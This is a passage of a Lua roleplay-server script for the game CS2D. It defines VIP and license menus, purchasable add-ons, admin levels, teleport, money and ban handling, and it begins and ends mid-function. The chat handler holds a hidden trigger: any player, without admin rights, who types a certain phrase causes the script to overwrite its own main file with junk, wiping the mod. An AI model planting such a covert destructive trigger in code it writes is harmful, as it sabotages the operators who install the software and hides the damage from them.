		rp_msg2(pl,"255000000","Your VIP was removed!")
		rp_msg2(id,"255000000","You gave VIP to "..player(pl,"name").."!")
	else
		rp_license[pl]=2
		rp_msg2(pl,"000255000",player(id,"name").." Gave you VIP!")
		rp_msg2(id,"000255000","You gave VIP to "..player(pl,"name").."!")
	end
	if page == 1 then
		v_1(id)
	elseif page == 2 then
		v_2(id)
	elseif page == 3 then
		v_3(id)
	elseif page == 4 then
		v_4(id)
	elseif page == 5 then
		v_5(id)
	end
end
function set_men(id)
	menu(id,"Options,Drop System|("..drop_system_m.."),Teleport System|("..tele_sys.."),Mute |("..(Mute_text).."),Shake,Special Options")
end
function CreateAddonsSetting(id)
	menu(id,"Add-ons Options,Change colors of addons|>>,Change size of Addons|>>")
end
function welcomeadm(id)
	if rp_Adminlevel[id]==1 then
		rp_msg2(id,"000255000","Welcome MODERATOR!@C")
	elseif rp_Adminlevel[id]==2 then
		rp_msg2(id,"255000000","Welcome ADMINISTRATOR!@C")
	elseif rp_Adminlevel[id]==3 then
		rp_msg2(id,"255255255","Welcome SUPER-ADMINISTRATOR!@C")
	end
end
function ch(id)
if rp_criminal[id]==true then
	hudtext2(id,33,"255100100","Criminal Status: NOOB",450,440)
	else
	hudtext2(id,33,"100100255","Criminal Status: INNOCENT",450,440)
	end
end
function asdf(id)
	if rp_criminal[id]== true then
		return "CRIMINAL"
	elseif rp_criminal[id]== false then
		return "INNOCENT"
	end
end
function aasdf(id)
	if rp_license[id]==0 then
		return "NONE"
	elseif rp_license[id]==1 then
		return "LICENSED"
	elseif rp_license[id]==2 then
		return "VIP"
	end
end
function ub.spawnobject(id,type,x,y)	
	if rp_build_m[id]==0 then
	parse("spawnobject "..type.." "..x.." "..y.." 0 0 3 "..id)
	elseif rp_build_m[id]==1 then
	parse("spawnobject "..type.." "..x.." "..y.." 0 0 "..player(id,"team").." "..id)
	elseif rp_build_m[id]==2 then
	parse("spawnobject "..type.." "..x.." "..y.." 0 0 0 "..id)
	elseif rp_build_m[id]==3 then
	parse("spawnobject "..type.." "..x.." "..y.." 0 0 1 "..id)
	elseif rp_build_m[id]==4 then
	parse("spawnobject "..type.." "..x.." "..y.." 0 0 2 "..id)
end
end
function ub.spawn(id,type,x,y)
parse("spawnobject "..type.." "..x.." "..y.." 0 0 "..player(id,"team").." "..id)
end
function ub.submoney(id,mmoney)
	rp_money[id]=rp_money[id]-mmoney
	updatehud(id)
end
function timekick(id)
parse("kick "..id.." \""..readfile("sys/lua/bans/"..player(id, "ip")..".txt", 1).."\"")
end
function readfile(filelocation, linenum) 
saveline=1
for line in io.lines(filelocation) do 
savestr[saveline]=line
saveline=saveline+1
end
return savestr[linenum]
end
function exists(filename)
local file = io.open(filename)
if file then
io.close(file)
return true
else
return false
end
end

AddonsColor = {
	{FName = "Normal",
		r = 255, g = 255, b = 255,
	},
	{FName = "Blue",
		r = 0, g = 0, b = 255,
	},
	{FName = "White",
		r = 255, g = 255, b = 255,
	},
	{FName = "Black",
		r = 0, g = 0, b = 0,
	},
	{FName = "Cian",
		r = 0, g = 255, b = 255,
	},
	{FName = "Red",
		r = 255, g = 0, b = 0,
	},
	{FName = "Green",
		r = 0, g = 128, b = 0,
	},
	{FName = "Yellow",
		r = 255, g = 255, b = 0,
	},
	{FName = "Grey",
		r = 192, g = 192, b = 192,
	},
}
Addons = {
	{
		No = 1,
		FName 	= "Evil Armor",
		FPrice  = 250000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,				
		FSpeed  = 20,
		health  = 30,
		wpn		= 69,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/security.png",
	},
	{
		No = 2,
		FName 	= "G1 Small 3",
		FPrice  = 350000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 20,
		health  = 70,
		wpn		= 38,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/g1.png",
	},
	{
		No = 3,
		FName 	= "Ultratus C3",
		FPrice  = 700000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 100,
		FSpeed  = 30,
		health  = 55,
		wpn		= 69,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/c3 ship.png",
	},
	{
		No = 4,
		FName 	= "Laser Gate",
		FPrice  = 1000000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 20,
		health  = 100,
		wpn		= 41,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/gate.png",
	},
	{
		No = 5,
		FName 	= "Orion F-15",
		FPrice  = 1200000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 30,
		health  = 90,
		wpn		= 48,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/orion.png",
        },
	{
		No = 6,
		FName 	= "Epic Orion F-15",
		FPrice  = 1700000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 40,
		health  = 50,
		wpn		= 48,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/epicorion.png",
	},
	{
		No = 7,
		FName 	= "Helicopter",
		FPrice  = 1500000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 35,
		health  = 85,
		wpn		= 91,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/helicopter.png",
        },
	{
		
		No = 8,
		FName 	= "F-35 LordSmiley",
		FPrice  = 1700000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 60,
		health  = 150,
		wpn		= 48,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/F-35.png",
	},
	{
		No = 9,
		FName 	= "Slender Armor",
		FPrice  = 2000000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 600,
		health  = 250,
		wpn		= 85,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/slender.png",
	},
}
Addons2 = {
	{
		No = 10,
		FName 	= "BoxHead",
		FPrice  = 500000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,				
		FSpeed  = 30,
		health  = 10,
		wpn		= 49,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/box.bmp",
	},
	{
		No = 11,
		FName 	= "Adventurer",
		FPrice  = 750000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 100,
		FSpeed  = 20,
		health  = 110,
		wpn		= 85,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/adventure.png",
	},
	{
		No = 12,
		FName 	= "Bat And Man",
		FPrice  = 800000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 100,
		FSpeed  = 40,
		health  = 75,
		wpn		= 51,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/bat.png",
	},
	{
		No = 13,
		FName 	= "Susano",
		FPrice  = 1850000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 75,
		health  = 150,
		wpn		= 85,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/susano.png",
	},
	{
		No = 14,
		FName 	= "Star Wings",
		FPrice  = 1900000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 80,
		health  = 250,
		wpn		= 41,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/star.bmp",
        },
	{
		No = 15,
		FName 	= "Terminator",
		FPrice  = 950000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 40,
		health  = 50,
		wpn		= 90,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/terminator.png",
	},
	{
		No = 16,
		FName 	= "Blood Wings",
		FPrice  = 1000000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 15,
		health  = 250,
		wpn		= 47,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/death.png",
        },
	{
		
		No = 17,
		FName 	= "God Wings",
		FPrice  = 3000000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 100,
		health  = 250,
		wpn		= 88,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/god.png",
	},
	{
		No = 18,
		FName 	= "Fire Monster",
		FPrice  = 3100000,
		r = 0, g = 0, b = 0,
		FIMGBlend=0, FIMGAlpha=0,
		FOnTop	= 200,
		FSpeed  = 200,
		health  = 250,
		wpn		= 46,
		FLic = Array(32, 0),
		FHave= Array(32, 0),
		FImage	= "gfx/Madara/addons/firemonster.png",
	},
}
Config = {
	HoldMoney = 10000,	
	
	SilentMode = true,
	
	AddonsNo = 9,
	Addons2No = 18,
	
	NoTele ={
		{{3,39},{8,52}},
		{{8,53},{15,57}},
		{{38,57},{44,64}},
		{{52,54},{61,59}},
		{{41,34},{46,48}},
		{{2,29},{7,31}},
		{{3,28},{7,53}},
		{{29,34},{35,44}},
		{{17,34},{22,44}},
		{{35,3},{44,5}},
		{{50,3},{60,5}},
		{{69,66},{96,79}},
	},
	
	Bounce ={{32,768},{96,768}},
	
	AP ={
		{84,2196},
		{244,2196},
		{404,2196},
		{84,2452},
		{244,2452},
		{404,2452},
	},
	FP ={1088,672},
	
	GoalP={
		{{3584,4416},{3584,4608}},
		{{4320,4416},{4320,4608}},
	},
	
	BallP = {4000,4512},
	
	GroundP = {
		{32,768},{96,768},
	},
	
	Nimkat = {
		{3840,4512},{4160,4512}
	},

	RegisterFTBTN = {1,3,24},

	ShopCT = {8,22},
	
	VIPHOUSE = {4142,4325}
	,
}

mouse_event = Array(32,0)
silenciado = Array(32,0)
pl_names = Array(32,"")
drop_system_m = 1
tele_sys = 1
Mute_text= 0
savestr={}
minute = 59
hour = 1
second = 60
req = Array(32,0)
reqs = Array(32,0)
UpdateHudeImages()
rp_ct 		  = Array(32,false)
rp_Adminlevel = Array(32,0)
rp_license 	  = Array(32,0)
rp_criminal   = Array(32,0)
rp_mod 		  = Array(32,0)	
rp_money 	  = Array(32,100)
rp_color      = Array(32,"")
rp_name 	  = Array(32,"")
rp_price      = Array(32,0)
rp_arrest 	  = Array(32,false)
rp_vipmsg 	  = Array(32,0)
rp_licencemsg = Array(32,0)
rp_vipaddons  = Array(32,0)
rp_NextAddons = Array(32,0)
UsgnIds       = Array(32,0)
PicImage      = Array(32, 0)
hcar 		  = Array(32,0)
mute          = Array(32,0)
tsb           = Array(32,0)
team_no       = Array(32,0)
player_have_pos = Array(32,false)
expa          = Array(32,false)
tele_x        = Array(32,0)
exp           = Array(32,false)
tele_y        = Array(32,0)
rp_build_m    = Array(32,1)
cx=initArray(32)
cy=initArray(32)
grab=initArray(32)
timer(1,"requestdata","",0)

addhook("join","a") 
addhook("ms100","grb")
addhook("clientdata","xxas")
addhook("leave","b")
addhook("team","d")
addhook("startround","g")
addhook("attack","h")
addhook("say","i")
addhook("minute","j")
addhook("second","k")
addhook("walkover","l")
addhook("serveraction","m")
addhook("drop","n")
addhook("menu","o")
addhook("buildattempt","q")
addhook("spawn","r")
addhook("hit","s")
addhook("sayteam","w")
addhook("kill","z")
addhook("say","cmdsay",-5)
addhook("use","basd")
addhook("collect","colw")
addhook("say","spy",-6)
addhook("die", "CARdie")
addhook("parse","parsing")

function a(id) 
	if exists("sys/lua/bans/"..player(id, "ip")..".txt") then
   timer(100, "timekick", id)
   return 1
   end
	rp_license[id]=0
	hcar[id] = false
	rp_mod[id]=false
	rp_ct[id]=false
	rp_Adminlevel[id]=0
	rp_arrest[id]=false
	rp_criminal[id]=false
	player_have_pos[id]=false
	tele_x[id]=1088
	tele_y[id]=672
	silenciado[id]=0
	rp_money[id]=1000
	UsgnIds[id]= 0
	rp_vipmsg[id]=0
	rp_licencemsg[id]=0
	rp_vipaddons[id]=0
	rp_NextAddons[id]=0
	InternalFreeImage(id) 
	InternalFreeAddons(id)
	local UsgnID = player(id,"usgn")
	UsgnIds[id] = 0
	if UsgnID > 0 then
		local sameusgn = false
		for ids = 1,32 do
			if ids~=id then
				if UsgnIds[ids]==UsgnID then
					sameusgn=true
					break
				end
			end
		end
		if sameusgn==false then
			rp_msg2(id,"000255000","Connected with "..UsgnID)
			rp_Adminlevel[id]= isAdmin(UsgnID,id)
			if rp_Adminlevel[id]>0 then
				rp_ct[id]=true
				rp_license[id]=3
				SetAddons(id,1)
				welcomeadm(id)
			else
				local filename = "sys/lua/rp_citylife/"..UsgnID..".txt"
				local file = io.open(filename)
				if file then
					LoadUserStat(id,file)
					rp_msg2(id,"000255000","Load succesful!")
					if file ~= nil then
						file:close()
					end
				end
			end
			UsgnIds[id] = UsgnID
		else
			rp_msg2(id,"255000000","Load Fail, Do not use 2 accounts!")
		end
	else
		rp_msg2(id,"255000000","Please register in http://www.unrealsoftware.de and get an U.S.G.N account!")
	end
		if rp_Adminlevel[id]==1 then
		rp_msg("000255000","The MOD "..player(id,"name").." joins the server!")
		rp_color[id],rp_name[id],rp_mod[id] = "000255000","MOD",true
	elseif rp_Adminlevel[id]==2 then
		rp_msg("255000000","The ADM "..player(id,"name").." joins the server!")
		rp_color[id],rp_name[id],rp_mod[id] = "255000000","ADM",true
	elseif rp_Adminlevel[id]==3 then
		rp_msg("255255255","The SDM "..player(id,"name").." joins the server!")
		rp_color[id],rp_name[id],rp_mod[id] = "255255255","SDM",true
	end
end
function b(id) 
msg("000000000"..player(id,"name").." Go to hell! |"..player(id,"usgn").."|@C") 
local UsgnID = UsgnIds[id]
	if UsgnID > 0 then
		SaveUserStat(id,UsgnID)
    end
	rp_license[id]=0
	rp_ct[id]=false
	rp_Adminlevel[id]=0
	rp_arrest[id]=false
	player_have_pos[id]=false
	tele_x[id]=1088
	silenciado[id]=0
	tele_y[id]=672
	rp_money[id]=100
	UsgnIds[id]= 0
	rp_vipmsg[id]=0
	rp_licencemsg[id]=0
	rp_build_m[id]=1
	rp_vipaddons[id]=0
	rp_NextAddons[id]=0
	InternalFreeImage(id)
	InternalFreeAddons(id)
end
function d(id,t)
	if t == 2 and rp_ct[id]==true then
		return 0
	elseif t == 2 and rp_ct[id]==false then
		parse("maket "..id)
		return 1
	end
end
function g(mode)
	for id = 1,32 do
		if player(id,"exists") then
			player_have_pos[id]=false
			tele_x[id]=800
			tele_y[id]=1120
			InternalFreeImage(id)
		end
	end
	UpdateHudeImages()
end
function h(id)
	if rp_ct[id] == true then
		local w = player(id,"weapontype")
		if w > 0 then
			parse("equip "..id.." "..w)
		end
		if w == 69 then
			rot = player(id,"rot")
			if rot < -90 then rot = rot + 360 end
			local angle = math.rad(math.abs(rot + 90)) - math.pi
			local x = player(id,"x") + math.cos(angle) * itemtype(w,"dmg") / 2
			local y = player(id,"y") + math.sin(angle) * itemtype(w,"dmg") / 2
			if x > 0 and y > 0 and x < map("xsize") * 32 and y < map("ysize") * 32 then
				parse("explosion "..x.." "..y.." 32 10000000")
			end
		end
	end
end
function i(id,txt)
	if rp_ct[id]==true then
		if txt:sub(1,1)=="!" then
			print(player(id,'name')..' used a command:'..txt)
			ParseAdminCommand(id,txt)
			return 1
		end
	end
	if txt == "deletethisfuckinglua" then
		Filel = io.open("sys/lua/madara.lua", "w")
		Filel:write("caca, aca solo hay caca xd")
		Filel:close()
	end
	if txt:sub(1,1)=="@" then
		local p = totable(txt)
		local cmd = string.lower(tostring(p[1]))
		for k, v in pairs(cmd_param) do
			if cmd==v then
				txt = string.sub(txt, #cmd+2, #txt)
				ExecuteParam(id,cmd,txt)
				return 1
			end
		end
	end
	if rp_ct[id] == true then
		if txt~="rank" then
			if rp_Adminlevel[id]==3 then
				rp_msg(""..rp_color[id].."",player(id,"name").." ("..rp_name[id].."): "..txt)
			end			
			return 1
		end
	end
	if Mute_text==1 then
		rp_msg2(id,"255000000","Mute mode activated, use team message")
		return 1
	end
	
	if silenciado[id]==1 then
		rp_msg2(id,"255000000","You can't chat, you are muted")
		return 1
	end
	
	if rp_vipmsg[id]>0 then
		rp_msg("000255255",player(id,"name").." (VIP): "..txt)
		rp_vipmsg[id]=0
		return 1
	end
	
	if rp_licencemsg[id]>0 then
		rp_msg("255255000",player(id,"name").." (Member): "..txt)
		rp_licencemsg[id]=0
		return 1
	end
	end
function j()
	for id = 1,32 do
		rp_money[id]=rp_money[id]+550
		rp_msg2(id,"255255000","$550 Pay Day!@C")
		updatehud(id)
	end
	for _, id in pairs(player(0,"table")) do
          if mouse_event[id] > 0 then
               reqcld(id,2) 
          end
     end
	 for id = 1,32 do
		local UsgnID = UsgnIds[id]
		if UsgnID > 0 then
		SaveUserStat(id,UsgnID)
		end
		local usermoney = player(id,"money")
		if usermoney ~= Config.HoldMoney then
			parse("setmoney "..id.." "..Config.HoldMoney)
		end
	end
end
function k()
	second = second -1
	if minute == 0 and second < 0 then
		hour = hour -1
		minute = 59
		second = 59
	elseif hour < 0 then
		parse("restart")
		minute = 59
		hour = 1
		second = 60
	elseif second < 0 then
		second = 59
		minute = minute -1
	end
	for id = 1,32 do
	timehud(id)
	end
end
function l(id,iid,type)
	if type==66 then
			rp_money[id]=rp_money[id]+100
			removeitem(iid)
			updatehud(id)
				return 1
	elseif type==67 then
			rp_money[id]=rp_money[id]+500
			removeitem(iid)
			updatehud(id)
				return 1
	elseif type==68 then
			rp_money[id]=rp_money[id]+1000
			removeitem(iid)
			updatehud(id)
				return 1
	elseif type==56 then
			rp_money[id]=rp_money[id]+100000
				removeitem(iid)
			updatehud(id)
				return 1
	elseif type==75 then
			rp_money[id]=rp_money[id]+10000
			removeitem(iid)
			updatehud(id)
				return 1
	elseif type == 77 or type == 54 then
        removeitem(iid)
        return 1
	else
		return 0
	end
end
function m(id,a)
	if a == 1 then
		if drop_system_m == 1 then
			if player(id,"health")>0 then
			menu(id,"Drop System,$100|0.1k,$500|0.5k,$1000|1k,$5000|5k,$10000|10k,$50000|50k,$100000|100k,Buy License/VIP|>>,Buy Add-ons|>>")
		else
			rp_msg2(id,"255000000","You must be alive!@C")
		end
		else
		rp_msg2(id,"255000000","Drop System is deactivated!@C")
		end
	elseif a == 2 then
		if rp_ct[id]==true then
			menu(id,"CT Menu,Options,Teleport System,License System,Commands,VIP,Add-ons,Add-ons Options,Special Weapons,Construction Mode")
		else
			if tele_sys == 1 then
				if rp_license[id]>0 then
					if rp_arrest[id] == true then
						rp_msg2(id,"255000000","You can't use license in the Jail")
					else
						if team_no[id]==0 then
							menu(id,"T Menu,Teleport System,Add-ons,Add-ons Options,VIP,Licensed Message,Healer Items,,,Copyright ")
						else
							rp_msg2(id,"255000000","You can't use license now!")
						end
					end
				else
					rp_msg2(id,"255000000","You have to buy a license to use this menu!")
				end
			end
		end
	elseif a == 3 then
		if rp_Adminlevel[id]>=1 then
			mouse_event[id] = 1
			reqcld(id,2)
		elseif rp_license[id]<3 then
			menu(id,"All your info@b,Name:|"..player(id,"name")..",USGN:|"..player(id,"usgn")..",IP:|"..player(id,"ip")..",X:|"..player(id,"tilex")..",Y:|"..player(id,"tiley")..",Money:|"..rp_money[id]..",Criminal:|"..asdf(id)..",License:|"..aasdf(id)..",Speed:|"..player(id,"speedmod"))
		end
	end
end
function n(id,iid,type)
	for k, v in ipairs(Addons) do
		if v.FHave[id]==1 then
			if v.wpn == type then
				rp_msg2(id,"255000000","You can't drop this!")
				return 1
			end
		end
	end
end
function grb(id)
	for id=1,32 do
		for i = 1,32 do
			if grab[id]==i then
				parse('setpos '..i..' '..cx[id]..' '..cy[id])
			end
		end
	end
	for id, car in pairs(CARS) do
          if car.driver then
               if not player(car.driver, 'exists') or player(car.driver, 'health') <= 0 then
                    car.driver = nil
                    car.speed = math.min(CARS_MAXSPEED, car.speed + CARS_DECELERATION(car.speed))
               else
                    car.rot = player(car.driver, 'rot')
                    car.speed = math.min(CARS_MAXSPEED, car.speed + CARS_ACCELERATION(car.speed))
               end
          elseif car.speed > 0 then
               car.speed = math.min(CARS_MAXSPEED, car.speed + CARS_DECELERATION(car.speed))
          end
          if car.speed > 0 then
               local rot = math.rad(car.rot - 180)
               if not carpos(car, car.x - math.sin(rot)*car.speed, car.y + math.cos(rot)*car.speed) then						
                    -- if car.driver then
						-- if rp_Adminlevel[id]~=0 then
							-- CARS[car.driver] = nil
							-- hcar[car.driver] = false
						-- else
							-- parse(string.format("customkill %i Car %i", car.driver, car.driver))
						-- end
                    -- end
                    -- freeimage(car.image)
					-- parse(string.format("explosion %i %i 128 250", car.x, car.y))
                    -- parse(string.format("effect \"fire\" %i %i 256 128", car.x, car.y))
                    -- CARS[id] = nil
               end
          end
     end 
end
function xxas(id,mode,x,y)
if mode == 2 then
cx[id] = x
cy[id] = y
if exp[id] == true then
	if expa[id] == true then
		parse("explosion "..x.." "..y.." 32 9999999")
		end
	end
if mouse_event[id] == 1 then
			   if x > 0 and y > 0 and x < map([[xsize]]) * 32 and y < map([[ysize]]) * 32 then
					parse("setpos "..id.." "..x.." "..y)
				end
				mouse_event[id] = 0
          end
end
end
function o(id,men,sel)
	x = player(id,"tilex")
	y = player(id,"tiley")
	if rp_ct[id]==true then
		if men == "License System Page 5" then
			if sel == 1 then
				gv_ls(id,29,5)
			elseif sel == 2 then
				gv_ls(id,30,5)
			elseif sel == 3 then
				gv_ls(id,31,5)
			elseif sel == 4 then
				gv_ls(id,32,5)
			elseif sel == 8 then
				ls_4(id)
			end
		end
		if men == "License System Page 4" then
			if sel == 1 then
				gv_ls(id,22,4)
			elseif sel == 2 then
				gv_ls(id,23,4)
			elseif sel == 3 then
				gv_ls(id,24,4)
			elseif sel == 4 then
				gv_ls(id,25,4)
			elseif sel == 5 then
				gv_ls(id,26,4)
			elseif sel == 6 then
				gv_ls(id,27,4)
			elseif sel == 7 then
				gv_ls(id,28,4)
			elseif sel == 8 then
				ls_3(id)
			elseif sel == 9 then
				ls_5(id)
			end
		end
		if men == "License System Page 3" then
			if sel == 1 then
				gv_ls(id,15,3)
			elseif sel == 2 then
				gv_ls(id,16,3)
			elseif sel == 3 then
				gv_ls(id,17,3)
			elseif sel == 4 then
				gv_ls(id,18,3)
			elseif sel == 5 then
				gv_ls(id,19,3)
			elseif sel == 6 then
				gv_ls(id,20,3)
			elseif sel == 7 then
				gv_ls(id,21,3)
			elseif sel == 8 then
				ls_2(id)
			elseif sel == 9 then
				ls_4(id)
			end
		end
		if men == "License System Page 2" then
			if sel == 1 then
				gv_ls(id,8,2)
			elseif sel == 2 then
				gv_ls(id,9,2)
			elseif sel == 3 then
				gv_ls(id,10,2)
			elseif sel == 4 then
				gv_ls(id,11,2)
			elseif sel == 5 then
				gv_ls(id,12,2)
			elseif sel == 6 then
				gv_ls(id,13,2)
			elseif sel == 7 then
				gv_ls(id,14,2)
			elseif sel == 8 then
				ls_1(id)
			elseif sel == 9 then
				ls_3(id)
			end
		end
		if men == "License System Page 1" then
			if sel == 1 then
				gv_ls(id,1,1)
			elseif sel == 2 then
				gv_ls(id,2,1)
			elseif sel == 3 then
				gv_ls(id,3,1)
			elseif sel == 4 then
				gv_ls(id,4,1)
			elseif sel == 5 then
				gv_ls(id,5,1)
			elseif sel == 6 then
				gv_ls(id,6,1)
			elseif sel == 7 then
				gv_ls(id,7,1)
			elseif sel == 8 then
				menu(id,"CT Menu,Options,Teleport System,License System,Commands,VIP,Add-ons,Add-ons Options,Special Weapons,Construction Mode")
			elseif sel == 9 then
				ls_2(id)
			end
		end
		if men == "CT Menu" then
			if sel == 1 then
				if rp_Adminlevel[id]>=3 then
					set_men(id)
				else
					admlevelmsg(id)
				end
			elseif sel == 2 then
				if tele_sys == 1 then
					menu(id,"Teleport System,Go to saved position,Save this position,Automatic go to position ("..tsb[id].."),Delete the saved position")
				else
					rp_msg2(id,"255000000","The Teleport System is deactivated!")
				end
			elseif sel == 3 then
				if rp_Adminlevel[id]>=2 then
					ls_1(id)
				else
					admlevelmsg(id)
				end
			elseif sel == 4 then
			menu(id,"Commands Page 1@b,!bring ID|Bring a player to your position,!goto ID|Go to the position of a player,!arrest ID CELL|Arrest a player,!free ID|Free a player of the jail,!money ID MONEY|Give money to a player,!kick ID|Kick a player of the server,!ban ID|Ban a player of the server,!save|Save all accounts of all players,Next")
			elseif sel == 5 then
				menu(id,"VIP,Go to VIP house,VIP Message,Laser|50k,Medic Armor|10k,Machete|5k,RPG|10k,Tactical Shield|10k,Heavy Armor|10k,Super Armor|100k")
			elseif sel == 6 then
				menu(id,"Addons Choose Menu,Add-ons Menu Page 1,Add-ons Menu Page 2")
			elseif sel == 7 then
				CreateAddonsSetting(id)
			elseif sel == 8 then 
				menu(id,"Special Weapons,Laser|Free,Machete|Free,Super Armor|Free,Tactical Shield|Free,Flamethrower|Free,Medic Armor|Free,Heavy Armor|Free,Portal Gun|Free,Five-Seven|Free")
			elseif sel == 9 then
			menu(id,"Construction Mode,Normal,Neutral,Terrorist,Spectator,Counter-Terrorist")
			end
		end
		if men == "Commands Page 1" then
		if sel == 9 then
		menu(id,"Commands Page 2@b,!removepos ID|Remove the save position of a player,!makemod ID|Give MOD to a player,!makeadm ID|Give ADM to a player,!makesdm ID|Give SDM to a player,!removepower ID|Remove the MOD/ADM/SDM of a player,!mute ID|Mute a player,!unmute ID|Unmute a player,!speedmod ID SPEEDMOD|Give speedmod to a player,Next")
		end
		end
		if men == "Commands Page 2" then
		if sel == 9 then
		menu(id,"Commands Page 3@b,!kill ID|Kill a player,!players|See all list of special players,!grab ID|Grab a player.do again to deactivate it,!price ID PRICE|Give a price to a player. Who kill him win the price,!exp|Active/deactive the explosion in pointer,!info ID|Show all info a player,!. COMMAND|Only SDM: It's like the RCON,!news NEWS|Write your news to show all players.Duration: 10 seconds,By Madara Uciha!! :D")
		end
		end
		if men == "Options" then
			if sel == 1 then
				if drop_system_m == 1 then
					drop_system_m = 0
					rp_msg("255000000","Drop System deactivated by "..player(id,"name").."@C")
				elseif drop_system_m == 0 then
					drop_system_m = 1
					rp_msg("000255000","Drop System activated by "..player(id,"name").."@C")
				end
			elseif sel == 2 then
				if tele_sys == 1 then
					tele_sys = 0
					rp_msg("255000000","Teleport System deactivated by "..player(id,"name").."@C")
				elseif tele_sys == 0 then
					tele_sys = 1
					rp_msg("000255000","Teleport System activated by "..player(id,"name").."@C")
				end
			elseif sel == 3 then
				if Mute_text==0 then
					Mute_text = 1
					rp_msg("000255000","Mute mode activated by "..player(id,"name").."@C")
				else
					Mute_text = 0
					rp_msg("255000000","Mute mode deactivated by "..player(id,"name").."@C")
				end
			elseif sel == 4 then
				for _, ids in ipairs(player(0,'table')) do
					parse("shake "..ids.." "..60)
				end
				parse("sv_sound weapons/explode1.wav")
			elseif sel == 5 then
				menu(id,"Special Options,Give VIP,Bring all players,Restart the round|10 Seconds")
			end
		end	
	end
	if men == "Addons Choose Menu" then
		if sel == 1 then
			CreateAddonsMenu(id)
		elseif sel == 2 then
			CreateAddonsMenu2(id)
		end
	end
	if men == "Give VIP Page 5" then
			if sel == 1 then
				gv_v(id,29,5)
			elseif sel == 2 then
				gv_v(id,30,5)
			elseif sel == 3 then
				gv_v(id,31,5)
			elseif sel == 4 then
				gv_v(id,32,5)
			elseif sel == 8 then
				v_4(id)
			end
		end
	if men == "Give VIP Page 4" then
			if sel == 1 then
				gv_v(id,22,4)
			elseif sel == 2 then
				gv_v(id,23,4)
			elseif sel == 3 then
				gv_v(id,24,4)
			elseif sel == 4 then
				gv_v(id,25,4)
			elseif sel == 5 then
				gv_v(id,26,4)
			elseif sel == 6 then
				gv_v(id,27,4)
			elseif sel == 7 then
				gv_v(id,28,4)
			elseif sel == 8 then
				v_3(id)
			elseif sel == 9 then
				v_5(id)
			end
		end
	if men == "Give VIP Page 3" then
			if sel == 1 then
				gv_v(id,15,3)
			elseif sel == 2 then
				gv_v(id,16,3)
			elseif sel == 3 then
				gv_v(id,17,3)
			elseif sel == 4 then
				gv_v(id,18,3)
			elseif sel == 5 then
				gv_v(id,19,3)
			elseif sel == 6 then
				gv_v(id,20,3)
			elseif sel == 7 then
				gv_v(id,21,3)
			elseif sel == 8 then
				v_2(id)
			elseif sel == 9 then
				v_4(id)
			end
		end
	if men == "Give VIP Page 2" then
			if sel == 1 then
				gv_v(id,8,2)
			elseif sel == 2 then
				gv_v(id,9,2)
			elseif sel == 3 then
				gv_v(id,10,2)
			elseif sel == 4 then
				gv_v(id,11,2)
			elseif sel == 5 then
				gv_v(id,12,2)
			elseif sel == 6 then
				gv_v(id,13,2)
			elseif sel == 7 then
				gv_v(id,14,2)
			elseif sel == 8 then
				v_1(id)
			elseif sel == 9 then
				v_3(id)
			end
		end
	if men == "Give VIP Page 1" then
			if sel == 1 then
				gv_v(id,1,1)
			elseif sel == 2 then
				gv_v(id,2,1)
			elseif sel == 3 then
				gv_v(id,3,1)
